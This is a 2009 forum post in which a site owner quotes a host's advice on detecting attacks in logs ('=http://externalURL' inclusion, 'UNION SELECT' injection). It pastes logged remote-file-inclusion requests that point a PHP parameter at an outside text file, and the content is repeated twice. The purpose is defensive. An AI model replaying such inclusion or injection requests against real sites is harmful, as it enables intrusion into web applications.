2009-05-05, 12:02 AM
Advise from my host about what to look for to detect hacking or other suspicious activity:
Generally, you need to look for requests, which target a PHP file on your website and end with:
=http://externalURL
This is a common method for exploiting vulnerable scripts by including external malicious content.
Another log entries, which may indicate hacking attempts include:
"UNION SELECT"
which is used for SQL injections, targeting your database data (usually trying to find the password for the administrator user).
Well guess what I saw in visitor's log today:
86.122.170.50
//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:07 Http Version: HTTP/1.1 Size in Bytes: 5889
Referer: -
Agent: Mozilla/5.0
/forum//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
/forum/index.php//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
Anybody else seen stuff like this or recognize it?
Generally, you need to look for requests, which target a PHP file on your website and end with:
=http://externalURL
This is a common method for exploiting vulnerable scripts by including external malicious content.
Another log entries, which may indicate hacking attempts include:
"UNION SELECT"
which is used for SQL injections, targeting your database data (usually trying to find the password for the administrator user).
Well guess what I saw in visitor's log today:
86.122.170.50
//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:07 Http Version: HTTP/1.1 Size in Bytes: 5889
Referer: -
Agent: Mozilla/5.0
/forum//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
/forum/index.php//index.php?&news_act=read&news_id=http://www.kyokushin.hu/fx29id2.txt???
Http Code: 200 Date: May 04 14:07:08 Http Version: HTTP/1.1 Size in Bytes: 68074
Referer: -
Agent: Mozilla/5.0
Anybody else seen stuff like this or recognize it?